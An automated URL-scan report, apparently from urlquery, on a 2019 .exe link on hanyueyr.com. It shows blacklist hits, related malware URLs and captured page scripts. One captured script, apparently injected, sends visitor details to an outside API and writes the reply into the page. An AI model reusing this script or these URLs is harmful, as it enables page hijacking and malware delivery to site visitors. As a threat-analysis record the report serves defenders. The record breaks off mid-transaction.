Overview

URL hanyueyr.com/3eebaA_426_111.exe
IP 104.207.47.103
ASN AS17139 Corporate Colocation Inc.
Location United States
Report completed 2019-06-07 16:08:14 CEST
urlquery Alerts No alerts detected


Settings

UserAgent Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Pool
Access Level


Intrusion Detection Systems

Suricata /w Emerging Threats Pro  No alerts detected


Blacklists

MDL  No alerts detected
OpenPhish  No alerts detected
PhishTank  No alerts detected
Fortinet's Web Filter
Added / Verified Severity Host Comment
2019-06-07 2 hanyueyr.com/3eebaA_426_111.exe Malware
2019-06-07 2 www.hanyueyr.com/3eebaA_426_111.exe Malware
2019-06-07 2 www.hanyueyr.com/jquery.la.min.js Malware
2019-06-07 2 www.hanyueyr.com/wp-content/themes/020list/style/css/960.css?ver=4.2.2 Malware
2019-06-07 2 www.hanyueyr.com/jquery.lb.min.js Malware
2019-06-07 2 www.hanyueyr.com/wp-content/themes/020list/style/js/jquery-1.11.1.min.js Malware
2019-06-07 2 www.hanyueyr.com/wp-includes/js/wp-emoji-release.min.js?ver=4.4.4 Malware
DNS-BH  No alerts detected
mnemonic secure dns  No alerts detected


Recent reports on same IP/ASN/Domain

Last 10 reports on IP: 104.207.47.103

Date  UQ / IDS / BL  URL  IP
2019-06-07 16:27:30 +0200  0 - 0 - 7  hanyueyr.com/2dYHit_426_170.exe  104.207.47.103
2019-06-07 16:26:46 +0200  0 - 0 - 7  hanyueyr.com/3ifP2b_426_170.exe  104.207.47.103
2019-06-07 16:26:31 +0200  0 - 0 - 7  hanyueyr.com/4MQKN4_426_170.exe  104.207.47.103
2019-06-07 16:24:15 +0200  0 - 0 - 7  hanyueyr.com/4iKAkS_426_111.exe  104.207.47.103
2019-06-07 16:23:00 +0200  0 - 0 - 7  hanyueyr.com/2Xba7z_426_117.exe  104.207.47.103
2019-06-07 16:22:40 +0200  0 - 0 - 7  hanyueyr.com/3K4cNk_426_117.exe  104.207.47.103
2019-06-07 16:19:53 +0200  0 - 0 - 7  hanyueyr.com/3zE6FW_426_170.exe  104.207.47.103
2019-06-07 16:19:09 +0200  0 - 0 - 7  hanyueyr.com/5Re8nf_426_170.exe  104.207.47.103
2019-06-07 16:08:03 +0200  0 - 0 - 7  hanyueyr.com/4ZRm5h_426_117.exe  104.207.47.103
2019-06-07 15:44:39 +0200  0 - 0 - 7  hanyueyr.com/3Nasyr_426_170.exe  104.207.47.103

Last 10 reports on ASN: AS17139 Corporate Colocation Inc.

Date  UQ / IDS / BL  URL  IP
2019-06-25 02:55:21 +0200  0 - 4 - 1  173.247.239.186/ok.exe  173.247.239.186
2019-06-10 23:09:23 +0200  0 - 0 - 2  voitureneuve.net/  199.195.142.109
2019-06-10 16:16:40 +0200  0 - 0 - 1  webpave.com/~tierra8/spanish/wp-content/mmp  205.134.241.29
2019-06-10 16:15:50 +0200  0 - 0 - 2  central-liquor.com/~tierra8/spanish/wp-content/mmp  205.134.241.149
2019-06-10 11:49:54 +0200  0 - 0 - 4  mixsweets.ae/wp-admin/LLC/sbm4rw8zkr2t5d83loe (...)  205.134.234.46
2019-06-09 14:03:01 +0200  0 - 0 - 2  janusprogram.com/themes/defaute/sold596/Free- (...)  205.134.241.102
2019-06-09 13:52:21 +0200  0 - 0 - 1  janusprogram.com/themes/defaute/sold596/Free- (...)  205.134.241.102
2019-06-09 08:32:32 +0200  0 - 0 - 2  vancouverreversemortgage.com/~prince57/cb06/L (...)  205.134.241.46
2019-06-09 06:41:10 +0200  0 - 0 - 3  howeasycn.net/default.php  45.3.38.227
2019-06-09 06:40:35 +0200  0 - 0 - 3  www.howeasycn.net/default.php  45.3.38.227

Last 10 reports on domain: hanyueyr.com

Date  UQ / IDS / BL  URL  IP
2019-06-07 16:27:30 +0200  0 - 0 - 7  hanyueyr.com/2dYHit_426_170.exe  104.207.47.103
2019-06-07 16:26:46 +0200  0 - 0 - 7  hanyueyr.com/3ifP2b_426_170.exe  104.207.47.103
2019-06-07 16:26:31 +0200  0 - 0 - 7  hanyueyr.com/4MQKN4_426_170.exe  104.207.47.103
2019-06-07 16:24:15 +0200  0 - 0 - 7  hanyueyr.com/4iKAkS_426_111.exe  104.207.47.103
2019-06-07 16:23:00 +0200  0 - 0 - 7  hanyueyr.com/2Xba7z_426_117.exe  104.207.47.103
2019-06-07 16:22:40 +0200  0 - 0 - 7  hanyueyr.com/3K4cNk_426_117.exe  104.207.47.103
2019-06-07 16:19:53 +0200  0 - 0 - 7  hanyueyr.com/3zE6FW_426_170.exe  104.207.47.103
2019-06-07 16:19:09 +0200  0 - 0 - 7  hanyueyr.com/5Re8nf_426_170.exe  104.207.47.103
2019-06-07 16:08:03 +0200  0 - 0 - 7  hanyueyr.com/4ZRm5h_426_117.exe  104.207.47.103
2019-06-07 15:44:39 +0200  0 - 0 - 7  hanyueyr.com/3Nasyr_426_170.exe  104.207.47.103


JavaScript

Executed Scripts (16)


Executed Evals (13)

#1 JavaScript::Eval (size: 3, repeated: 1) - SHA256: fd0ad9026eee596b7072a762941f60bef57e760a230edd450b3a634825685c2a

                                        (1)
                                    

#2 JavaScript::Eval (size: 3, repeated: 1) - SHA256: 0e77e68ba5473d98840c3212f4a8cb801226494f1162c8001a9f4ed7b00cbaa8

                                        (2)
                                    

#3 JavaScript::Eval (size: 3, repeated: 1) - SHA256: 46f789d1efeefad080846917a6a4a761d0e1804bb0a4f27fa4634a887ec26265

                                        (3)
                                    

#4 JavaScript::Eval (size: 271, repeated: 1) - SHA256: f0a48f78c1eead1ca6d696a444fb2828024a6081544800c730520340e04b0f8d

                                        ({
    "rl": "1176*885",
    "lang": "en-US",
    "ct": "unknow",
    "pf": 1,
    "ins": 0,
    "vd": 2,
    "ce": 1,
    "cd": 24,
    "ds": "",
    "ing": 3,
    "ekc": "",
    "sid": 1559916458450,
    "tt": "Nothing found for 3Eebaa_426_111 Exe",
    "kw": "",
    "cu": "http://www.hanyueyr.com/3eebaA_426_111.exe",
    "pu": ""
})
                                    

#5 JavaScript::Eval (size: 271, repeated: 1) - SHA256: 67257f5c972d749ebac5f0e6bac31cc44583b3e683a29b010b3b98f404af118a

                                        ({
    "rl": "1176*885",
    "lang": "en-US",
    "ct": "unknow",
    "pf": 1,
    "ins": 0,
    "vd": 2,
    "ce": 1,
    "cd": 24,
    "ds": "",
    "ing": 4,
    "ekc": "",
    "sid": 1559916458489,
    "tt": "Nothing found for 3Eebaa_426_111 Exe",
    "kw": "",
    "cu": "http://www.hanyueyr.com/3eebaA_426_111.exe",
    "pu": ""
})
                                    

#6 JavaScript::Eval (size: 272, repeated: 1) - SHA256: b39c5fed2b9cdd45dbd6ccde44494483968640742d9bba4729bac7f6fe940e39

                                        ({
    "rl": "1176*885",
    "lang": "en-US",
    "ct": "unknow",
    "pf": 1,
    "ins": 1,
    "vd": 1,
    "ce": 1,
    "cd": 24,
    "ds": "",
    "ing": 1,
    "ekc": "",
    "sid": 1559916458450,
    "tt": "Nothing found for  3Eebaa_426_111 Exe",
    "kw": "",
    "cu": "http://www.hanyueyr.com/3eebaA_426_111.exe",
    "pu": ""
})
                                    

#7 JavaScript::Eval (size: 272, repeated: 1) - SHA256: abc76db62291ae696688099dc2fc7b80402d8a23c1a22ba2f70285341d6e250a

                                        ({
    "rl": "1176*885",
    "lang": "en-US",
    "ct": "unknow",
    "pf": 1,
    "ins": 1,
    "vd": 1,
    "ce": 1,
    "cd": 24,
    "ds": "",
    "ing": 2,
    "ekc": "",
    "sid": 1559916458489,
    "tt": "Nothing found for  3Eebaa_426_111 Exe",
    "kw": "",
    "cu": "http://www.hanyueyr.com/3eebaA_426_111.exe",
    "pu": ""
})
                                    

#8 JavaScript::Eval (size: 59, repeated: 1) - SHA256: f6c6a3f9c5f741cdcf499bba731944cf36063e8fc6bafbeb35d44160528fd553

                                        ({
    "sid": 1559916458450,
    "vd": 1,
    "expires": 1559918258450
})
                                    

#9 JavaScript::Eval (size: 59, repeated: 1) - SHA256: f6c75b6ce9bfb57adbf5872899063fd609fff13e5b0f887559d8e6dd8f27ad61

                                        ({
    "sid": 1559916458450,
    "vd": 2,
    "expires": 1559918260724
})
                                    

#10 JavaScript::Eval (size: 59, repeated: 1) - SHA256: 965b0c88eff86bcb3db1991e77667a47a2d214f6181c7956d4a9ac7b39cdf519

                                        ({
    "sid": 1559916458489,
    "vd": 1,
    "expires": 1559918258489
})
                                    

#11 JavaScript::Eval (size: 59, repeated: 1) - SHA256: 22689a9f917c977d6d905caad94ad5c1da7f4a2c188f08ae359e4d35957e7d8a

                                        ({
    "sid": 1559916458489,
    "vd": 2,
    "expires": 1559918260740
})
                                    

#12 JavaScript::Eval (size: 4, repeated: 3) - SHA256: 5b8d2b991d2c1f5bf78beb557d17e6650086a267e5ffd4bb6f8aaa942c570f5d

                                        ({})
                                    

#13 JavaScript::Eval (size: 2870, repeated: 1) - SHA256: c86b64226490c2337ae27e2f3c1033ed7e35f202b2a774c98b1ff141ad7ac930

                                        function ajax(params) {
    params = params || {};
    params.data = params.data || {};
    var json = params.jsonp ? jsonp(params) : json(params);

    function json(params) {
        params.type = (params.type || 'GET').toUpperCase();
        params.data = formatParams(params.data);
        var xhr = null;
        if (window.XMLHttpRequest) {
            xhr = new XMLHttpRequest()
        } else {
            xhr = new ActiveXObjcet('Microsoft.XMLHTTP')
        };
        xhr.onreadystatechange = function() {
            if (xhr.readyState == 4) {
                var status = xhr.status;
                if (status >= 200 && status < 300) {
                    var response = '';
                    var type = xhr.getResponseHeader('Content-type');
                    if (type.indexOf('xml') !== -1 && xhr.responseXML) {
                        response = xhr.responseXML;
                    } else if (type === 'application/json') {
                        response = JSON.parse(xhr.responseText);
                    } else {
                        response = xhr.responseText;
                    };
                    params.success && params.success(response)
                } else {
                    params.error && params.error(status)
                }
            }
        };
        if (params.type == 'GET') {
            xhr.open(params.type, params.url + '?' + params.data, true);
            xhr.send(null)
        } else {
            xhr.open(params.type, params.url, true);
            xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded; charset=UTF-8');
            xhr.send(params.data)
        }
    }

    function formatParams(data) {
        var arr = [];
        for (var name in data) {
            arr.push(encodeURIComponent(name) + '=' + encodeURIComponent(data[name]))
        };
        arr.push('v=' + random());
        return arr.join('&')
    }

    function random() {
        return Math.floor(Math.random() * 10000 + 500)
    }
}
var browser = {
    versions: function() {
        var u = navigator.userAgent,
            app = navigator.appVersion;
        return {
            trident: u.indexOf("Trident") > -1,
            presto: u.indexOf("Presto") > -1,
            webKit: u.indexOf("AppleWebKit") > -1,
            gecko: u.indexOf("Gecko") > -1 && u.indexOf("KHTML") == -1,
            mobile: !!u.match(/AppleWebKit.*Mobile.*/),
            ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/),
            android: u.indexOf("Android") > -1 || u.indexOf("Linux") > -1,
            iPhone: u.indexOf("iPhone") > -1,
            iPad: u.indexOf("iPad") > -1,
            webApp: u.indexOf("Safari") == -1
        }
    }(),
    language: (navigator.browserLanguage || navigator.language).toLowerCase()
};
if (browser.versions.mobile) {
    var from = 'mobile';
    var meta = document.createElement('meta');
    meta.name = 'viewport';
    meta.content = 'width=device-width,initial-scale=1.0,minimum-scale=1.0,maximum-scale=1.0,user-scalable=0';
    document.getElementsByTagName('head')[0].appendChild(meta);
    var cssBaseUrl = 'https://www.jixian678.com';
    var styleOne = document.createElement('link');
    styleOne.href = cssBaseUrl + '/wap/css/reset.css';
    styleOne.rel = 'stylesheet';
    styleOne.type = 'text/css';
    document.getElementsByTagName('head')[0].appendChild(styleOne);
    var styleTwo = document.createElement('link');
    styleTwo.href = cssBaseUrl + '/wap/css/index.css';
    styleTwo.rel = 'stylesheet';
    styleTwo.type = 'text/css';
    document.getElementsByTagName('head')[0].appendChild(styleTwo)
} else {
    var from = 'pc'
}
var title = document.title;
ajax({
    url: 'https://api.huizhongkameng.com/nlp/index.php',
    type: 'GET',
    data: {
        keyword: document.title,
        from: from,
        originUrl: document.location.href,
        referer: document.referrer,
        userAgent: navigator.userAgent
    },
    success: function(res) {
        document.write(res);
        document.title = title;
        document.close()
    },
    error: function(error) {}
});
                                    

Executed Writes (4)

#1 JavaScript::Write (size: 244, repeated: 2) - SHA256: 5cde8666180a70a506d0d355f47d081f1ffd0c76b60dce76364d4b9dab252a26

<a href="https://www.51.la/?comId=18849991" title="51.La Q�A�ߡ��" target="_blank"><span style="display:inline-block;background-color:#25A69A;color:#fff;padding:2px 5px;font-family:arial;font-size:12px;font-weight:bold;">51 La</span></a>
                                    

#2 JavaScript::Write (size: 137, repeated: 2) - SHA256: 067b18d4f6f3a513ceb5b45c3c42675f52af6f00dfa4d73d7cf92f62d5e30cdd

<div style="display:none;height:0"><script language="javascript" type="text/javascript" src="http://js.users.51.la/18864699.js"></script>
                                    

#3 JavaScript::Write (size: 6702, repeated: 1) - SHA256: 71a20852e850b7e476acca60a33647183bb7331d93e41ddb1d78b0eda2019c60


#4 JavaScript::Write (size: 108, repeated: 2) - SHA256: 121678a2850ffd55e099881acebb6ea1936e8a3dc791383fdfb27bba1df71aeb

<script language="javascript" type="text/javascript" src="http://js.users.51.la/18849991.js"></script></div>
                                    


HTTP Transactions (65)


Request Response
                                        
                                            GET /3eebaA_426_111.exe HTTP/1.1 
Host: hanyueyr.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         104.207.47.103
HTTP/1.1 301 Moved Permanently
Content-Type: text/html
                                        
Server: nginx
Date: Fri, 07 Jun 2019 14:03:08 GMT
Content-Length: 178
Connection: keep-alive
Location: http://www.hanyueyr.com/3eebaA_426_111.exe


--- Additional Info ---
Magic:  HTML document text
Size:   178
Md5:    cd2e0e43980a00fb6a2742d3afd803b8
Sha1:   81ffbd1712afe8cdf138b570c0fc9934742c33c1
Sha256: bd9df047d51943acc4bc6cf55d88edb5b6785a53337ee2a0f74dd521aedde87d

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /3eebaA_426_111.exe HTTP/1.1 
Host: www.hanyueyr.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         104.207.47.103
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
                                        
Server: nginx
Date: Fri, 07 Jun 2019 14:03:08 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.29
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <http://www.hanyueyr.com/wp-json/>; rel="https://api.w.org/"
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   5104
Md5:    16e87d5f13785595b3df39368784ae54
Sha1:   dcb5917a68d88f39b4b357448a950f1d337fdde8
Sha256: 100678ed7b75dbbe00736ae35186104ee94327c9809a67e283b5f2c4ce293d8e

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/themes/020list/style.css HTTP/1.1 
Host: www.hanyueyr.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
                                         104.207.47.103
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx
Date: Fri, 07 Jun 2019 14:03:08 GMT
Last-Modified: Tue, 31 May 2016 01:02:08 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Etag: W/"574ce290-6f41"
Expires: Sat, 08 Jun 2019 02:03:08 GMT
Cache-Control: max-age=43200
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   7001
Md5:    2c6d0f5f32fb146980a0bea761961929
Sha1:   bbe46ae36772bfa431b9d5329b65403c476e4fec
Sha256: 2239838f3be679252ba15d501e6d5e64a7867318a8e3af4664a1884d9aee57a4
                                        
                                            GET /jquery.la.min.js HTTP/1.1 
Host: www.hanyueyr.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
                                         104.207.47.103
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Fri, 07 Jun 2019 14:03:09 GMT
Content-Length: 314
Last-Modified: Tue, 31 May 2016 13:11:14 GMT
Connection: keep-alive
Etag: "574d8d72-13a"
Expires: Sat, 08 Jun 2019 02:03:09 GMT
Cache-Control: max-age=43200
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   314
Md5:    4f1d07fbf94281961602177cf7dda35b
Sha1:   b35935fa45cbc5bebe214a5042f1b9380da885dd
Sha256: 78407145cf3c96b3e551479be8d3b37eb1130e5c995c20088402b9ecdc28d772

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/themes/020list/style/css/css1.css HTTP/1.1 
Host: www.hanyueyr.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
                                         104.207.47.103
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx
Date: Fri, 07 Jun 2019 14:03:09 GMT
Last-Modified: Tue, 31 May 2016 01:02:08 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Etag: W/"574ce290-ac2"
Expires: Sat, 08 Jun 2019 02:03:09 GMT
Cache-Control: max-age=43200
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   684
Md5:    4bab85c5c8ebfb4d9e29c2b9ec62cebe
Sha1:   cf878ab10a662a4b752671349b68a12f82422c94
Sha256: 42761ae7f475d22ac082b13cea66d704d4d9f5e0211b97acf602e9f2eccd728b
                                        
                                            GET /wp-content/themes/020list/style/css/960.css?ver=4.2.2 HTTP/1.1 
Host: www.hanyueyr.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
                                         104.207.47.103
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx
Date: Fri, 07 Jun 2019 14:03:09 GMT
Last-Modified: Tue, 31 May 2016 01:02:08 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Etag: W/"574ce290-2991"
Expires: Sat, 08 Jun 2019 02:03:09 GMT
Cache-Control: max-age=43200
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   1978
Md5:    475ee3d7dbbb2f6a00968eaf0501b054
Sha1:   f6f1860a2187b0e9ed26f9574429b4aeaa8b9d17
Sha256: a9682a0b3b819ff0c4468e22fdee729203ca8e4c343cab5f56b456c36cc3bc84

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /jquery.lb.min.js HTTP/1.1 
Host: www.hanyueyr.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
                                         104.207.47.103
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Fri, 07 Jun 2019 14:03:09 GMT
Last-Modified: Thu, 27 Sep 2018 13:03:52 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Etag: W/"5bacd538-a5b"
Expires: Sat, 08 Jun 2019 02:03:09 GMT
Cache-Control: max-age=43200
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   1673
Md5:    27df864e87d5d1464ba94a412f1540f1
Sha1:   a9d6c2e2ee95028290c4b2a3102131caa55e0431
Sha256: 757ed53dababeff8b79ed3017541e367f72363688d2359dcaf9a13f6e9fd3da0

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/themes/020list/style/images/logo-80px.gif HTTP/1.1 
Host: www.hanyueyr.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
                                         104.207.47.103
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: nginx
Date: Fri, 07 Jun 2019 14:03:09 GMT
Content-Length: 866
Last-Modified: Tue, 31 May 2016 01:02:08 GMT
Connection: keep-alive
Etag: "574ce290-362"
Expires: Sun, 07 Jul 2019 14:03:09 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 80 x 29
Size:   866
Md5:    6f5433724f999a096e8a76e6d5918803
Sha1:   6ed88cb4676d384b6b3c7d8ceee5f48aa1bbb524
Sha256: c3523c84b03a264ff85e541415f945c4c44705c454234274c78d63afd1c278b9
                                        
                                            GET /wp-content/themes/020list/style/js/jquery-1.11.1.min.js HTTP/1.1 
Host: www.hanyueyr.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
                                         104.207.47.103
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Fri, 07 Jun 2019 14:03:09 GMT
Last-Modified: Tue, 31 May 2016 01:02:08 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Etag: W/"574ce290-1762a"
Expires: Sat, 08 Jun 2019 02:03:09 GMT
Cache-Control: max-age=43200
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   37386
Md5:    2adc9cff004de22211d32def6198c0f6
Sha1:   db38c30a54aa9c6f7ecda86dad98a5436765216f
Sha256: a1cd5a94c395c68e04ae01fe699820e1547e08ce41050f7523581ef552324ac1

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/themes/020list/style/images/bg-pattern.png HTTP/1.1 
Host: www.hanyueyr.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
                                         104.207.47.103
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Server: nginx
Date: Fri, 07 Jun 2019 14:03:09 GMT
Content-Length: 2360
Last-Modified: Tue, 31 May 2016 01:02:08 GMT
Connection: keep-alive
Etag: "574ce290-938"
Expires: Sun, 07 Jul 2019 14:03:09 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image, 102 x 78, 8-bit colormap, non-interlaced
Size:   2360
Md5:    911bf43be1f3b70b8a7f757ee3dec6f2
Sha1:   ac7d8ee40480989a5ca3814d0e296601a89c2506
Sha256: 0ecaddb1fbc5f091c1d9b535fe34188b7cac56b3a0d7ce7a7a683212e18ff0c2
                                        
                                            POST / HTTP/1.1 
Host: ocsp.int-x3.letsencrypt.org
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 117
Content-Type: application/ocsp-request

                                         
                                         91.135.34.19
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 527
Etag: "5B30A610485EC7712CAF55401DA233AB3FD61EBEE5508A7574ED813B1E7BE478"
Last-Modified: Wed, 05 Jun 2019 19:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=17944
Expires: Fri, 07 Jun 2019 19:06:41 GMT
Date: Fri, 07 Jun 2019 14:07:37 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  data
Size:   527
Md5:    4aa05f8a8118ced2dc90ed7c8c511695
Sha1:   bd1b3ffb7b35342c4a089ca30e47de00c255e41f
Sha256: 5b30a610485ec7712caf55401da233ab3fd61ebee5508a7574ed813b1e7be478
                                        
                                            POST / HTTP/1.1 
Host: isrg.trustid.ocsp.identrust.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request

                                         
                                         91.135.34.25
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: Apache
Content-Transfer-Encoding: Binary
Last-Modified: Wed, 05 Jun 2019 20:48:41 GMT
Etag: "be20eb2063e0306a89d35ea475610e4c06553c73"
Content-Length: 1396
Cache-Control: public, no-transform, must-revalidate, max-age=14607
Expires: Fri, 07 Jun 2019 18:11:05 GMT
Date: Fri, 07 Jun 2019 14:07:38 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  data
Size:   1396
Md5:    9474e9d20a76d943317f6ad5956ce114
Sha1:   be20eb2063e0306a89d35ea475610e4c06553c73
Sha256: 847435cf43748fa7de0d338f8e82c92580f3315d9b72e7e489973a9ba6113383
                                        
                                            GET /wp-includes/js/wp-emoji-release.min.js?ver=4.4.4 HTTP/1.1 
Host: www.hanyueyr.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
                                         104.207.47.103
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Fri, 07 Jun 2019 14:03:09 GMT
Last-Modified: Tue, 31 May 2016 01:02:08 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Etag: W/"574ce290-848c"
Expires: Sat, 08 Jun 2019 02:03:09 GMT
Cache-Control: max-age=43200
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   8440
Md5:    78520ef7f0e8ff48d6f730b959e41f99
Sha1:   cc00d8daba54cc7e366f920f20685a55637c3a20
Sha256: 2c5c9dc36d5300c8c1ffa261d244fe7a13b4e4fb8d89290678bce3f3aa24e409

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /18864699.js HTTP/1.1 
Host: js.users.51.la
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
